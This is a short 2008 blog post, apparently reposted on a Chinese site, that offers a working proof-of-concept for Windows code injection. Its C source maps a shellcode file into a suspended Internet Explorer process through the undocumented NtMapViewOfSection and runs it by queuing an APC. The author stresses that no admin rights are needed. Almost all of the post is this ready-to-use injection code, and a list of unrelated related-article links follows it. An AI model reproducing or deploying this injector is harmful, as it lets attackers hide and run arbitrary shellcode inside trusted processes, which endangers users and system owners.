New techniques for codeinjection
2008-03-22 15:45
399 查看
I found some new possibilities for executing code in the context of a remote process. Using a undocumented function for writing the code to the remote process address space, and a new methode for executing it in the context of it. The techniques working complete in userspace, and don't need any special requirements like admin rights or something like that. See the source of the PoC, it's pretty self explaining. Sorry for my english, I'm from germany...
#define _WIN32_WINNT 0x0400 #include <windows.h> typedef LONG NTSTATUS, *PNTSTATUS; #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) typedef enum _SECTION_INHERIT { ViewShare = 1, ViewUnmap = 2 } SECTION_INHERIT; typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG ); func_NtMapViewOfSection NtMapViewOfSection = NULL; <cont> LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress ) { NTSTATUS Status; LARGE_INTEGER SectionOffset; ULONG ViewSize; ULONG Protect; LPVOID ViewBase; // Convert the offset SectionOffset.LowPart = dwFileOffsetLow; SectionOffset.HighPart = dwFileOffsetHigh; // Save the size and base ViewBase = lpBaseAddress; ViewSize = dwNumberOfBytesToMap; // Convert flags to NT Protection Attributes if (dwDesiredAccess & FILE_MAP_WRITE) { Protect = PAGE_READWRITE; } else if (dwDesiredAccess & FILE_MAP_READ) { Protect = PAGE_READONLY; } else if (dwDesiredAccess & FILE_MAP_COPY) { Protect = PAGE_WRITECOPY; } else { Protect = PAGE_NOACCESS; } // Map the section Status = NtMapViewOfSection(hFileMappingObject, hProcess, &ViewBase, 0, 0, &SectionOffset, &ViewSize, ViewShare, 0, Protect); if (!NT_SUCCESS(Status)) { // We failed return NULL; } // Return the base return ViewBase; } int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int) { HMODULE hDll = LoadLibrary( "ntdll.dll" ); NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection"); // Getting a shellcode, use whatever you want HANDLE hFile = CreateFile ("C://shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL); // Starting target process STARTUPINFO st; ZeroMemory (&st, sizeof(st)); st.cb = sizeof (STARTUPINFO); PROCESS_INFORMATION pi; ZeroMemory (&pi, sizeof(pi)); CreateProcess ("C://Programme//Internet Explorer//iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi); // Injecting the shellcode into target process address space LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL); // Create a new APC which will be executed at first when the thread resume QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL); ResumeThread (pi.hThread); CloseHandle (hFile); CloseHandle (hMappedFile); CloseHandle (pi.hThread); CloseHandle (pi.hProcess); return 0; }
相关文章推荐
- CodeRush for Visual Studio .NET v.3.0.2 (Beta) released on 18 Dec 2007 and What'a New
- Best Practice Techniques for Code Reviews
- Global Announcements Webpart – New Code for free.
- microsoft source code analyzer for sql injection
- SFX-SQLi: A new SQL injection technique for MSSQL (dumps a table in one request!)
- SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW)
- 《Writing Clear Code---- Microsoft Techniques for Developing Bug-free C Programs 》摘录
- Intanced Tessellation -- A new part of the GPU pipeline for surface techniques in DX10 and coming DX11
- Coding techniques for protecting against Sql injection
- 好文推荐:Development Tools and Techniques for Working with Code in Windows SharePoint Services 3.0
- DNS injection code base on ruby have be published,We will face a new chanllenge on website security
- CodeRush for Visual Studio .NET v.2.5.11 released on 18 Dec 2007 and What's New
- 好文推荐:Development Tools and Techniques for Working with Code in Windows SharePoint Services 3.0
- MS SQL错误:SQL Server failed with error code 0xc0000000 to spawn a thread to process a new login or connection. Check the SQL Server error log and the Windows event logs for information about possible related problems
- Gantt Component for Delphi Pure Pascal code(TsyGantt VCL)
- New Year and Old Property CodeForces - 611B
- android code bbs for developer
- D - New Year Table CodeForces - 140A——double精度+弧度角度转化
- GVF&nbsp;-&nbsp;a&nbsp;new&nbsp;snake&nbsp;algorithm&nbsp;for&nbsp;…
- Xcode8真机测试问题 code signing is required for product type 'Application' in SDK 'iOS 10.0'